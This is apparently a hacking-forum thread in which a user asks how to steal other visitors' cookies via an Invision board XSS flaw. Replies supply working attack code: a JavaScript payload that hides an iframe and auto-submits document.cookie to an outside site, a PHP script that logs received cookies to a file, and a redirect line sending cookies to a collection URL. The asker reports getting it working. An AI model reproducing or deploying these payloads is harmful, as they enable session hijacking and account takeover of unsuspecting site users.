[KarachiKing555]

i was just curious how can some get remote users cookies ! this vul shows only your cookie but i want some lil hints how could one get others cookies !! have u setup the php script somewhere else and use some java script:write functiont so thet it sends the whole data to your site rather then poping it up ??

Invision XSS Vul

[Kenny]

KarachiKing555... see my reply in the exploit section

regards

[nuorder]

heres one i made in the early days, its not perfect but something to get you started

Quote

document.write('<div style="visibility:hidden;"><iframe src="" name="vvv" width="1" height="1" frameborder="no"></iframe></div>')
document.write('<form name="f1" action="http://www.example.com/addstuff.asp" method="POST" target="vvv">');
document.write('<input type="hidden" name="cookiemonster" value="' + document.cookie + '"/>');
document.write('</form>');
document.forms[0].submit();

I seem to recall that i used this method rather than a straight iframe so it wouldn't show in the history as much.

you will need some form of sql database to store these, using php to email them or write to a file is good too

[CereBrums]

well,
u can easily direct the cookie to another site,
that will get the information and log it.
as so:

<?php	
	$text = $_GET['info'];
	$filen = "log.txt";
	$fo = fopen($filen, "a");
	fputs($fo, "$text\r\n");

fclose($fo);	
?>

the cookies will be saved in the file 'log.txt'

the refer is being made using this cmd:

javascript:document.location("http://site.com/get.php?info=" + document.cookie);

the line
$text = $_GET['info']
gets the data recieved in the var 'info' from the url...

hope u got it .

[KarachiKing555]

Thx alot Nuorder and Cerebrums ! i got it working now ! ;)

[d12boy420]

thanks

BN says:
Bad start! Suspended 14 days for THANKS post.